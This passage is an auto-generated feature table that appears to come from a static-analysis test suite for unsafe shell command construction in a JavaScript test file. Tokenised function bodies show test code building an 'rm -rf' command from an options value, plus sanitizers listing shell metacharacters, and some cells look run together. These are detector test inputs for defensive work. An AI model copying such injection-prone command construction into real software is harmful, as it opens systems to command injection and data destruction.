name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:33:281:35 | bla | contextSurroundingFunctionParameters | (opts) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:33:281:35 | bla | enclosingFunctionBody | opts cp exec rm -rf opts bla opts opts bla opts bla cp exec rm -rf opts bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:33:281:35 | bla | enclosingFunctionName | start | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:281:33:281:35 | bla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:285:1:285:0 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:285:1:285:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:285:1:285:0 | this | enclosingFunctionBody | str result str result result replace />/g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g | CalleeFlexibleAccessPath | result.replace | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:287:27:287:30 | />/g | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:287:27:287:30 | />/g | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:287:27:287:30 | />/g | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:287:27:287:30 | />/g | enclosingFunctionBody | str result str result result replace />/g result result replace //g | enclosingFunctionName | sanitizeShellString | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:287:27:287:30 | />/g | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:287:27:287:30 | />/g | receiverName | result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:287:33:287:34 | "" | CalleeFlexibleAccessPath | result.replace | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:287:33:287:34 | "" | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:287:33:287:34 | "" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:287:33:287:34 | "" | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:287:33:287:34 | "" | enclosingFunctionBody | str result str result result replace />/g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace //g result result replace / s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:373:0 | this | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:373:0 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:403:1 | 'arguments' object of function yetAnohterSanitizer | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:403:1 | 'arguments' object of function yetAnohterSanitizer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:403:1 | 'arguments' object of function yetAnohterSanitizer | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:403:1 | 'arguments' object of function yetAnohterSanitizer | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:403:1 | 'arguments' object of function yetAnohterSanitizer | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:403:1 | exceptional return of function yetAnohterSanitizer | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:403:1 | exceptional return of function yetAnohterSanitizer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:403:1 | exceptional return of function yetAnohterSanitizer | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:403:1 | exceptional return of function yetAnohterSanitizer | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:403:1 | exceptional return of function yetAnohterSanitizer | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:403:1 | functio ... sult;\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:403:1 | functio ... sult;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:403:1 | functio ... sult;\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:403:1 | return of function yetAnohterSanitizer | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:403:1 | return of function yetAnohterSanitizer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:403:1 | return of function yetAnohterSanitizer | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:403:1 | return of function yetAnohterSanitizer | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:1:403:1 | return of function yetAnohterSanitizer | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:10:373:28 | yetAnohterSanitizer | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:10:373:28 | yetAnohterSanitizer | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:10:373:28 | yetAnohterSanitizer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:10:373:28 | yetAnohterSanitizer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:10:373:28 | yetAnohterSanitizer | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:10:373:28 | yetAnohterSanitizer | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:10:373:28 | yetAnohterSanitizer | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:30:373:32 | str | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:30:373:32 | str | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:30:373:32 | str | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:30:373:32 | str | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:30:373:32 | str | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:30:373:32 | str | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:30:373:32 | str | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:30:373:32 | str | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:30:373:32 | str | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:373:30:373:32 | str | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:8:374:8 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:8:374:8 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:8:374:8 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:8:374:8 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:8:374:8 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:8:374:20 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:8:374:20 | s | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:8:374:20 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:374:8:374:20 | s | enclosingFunctionName | yetAnohterSanitizer | 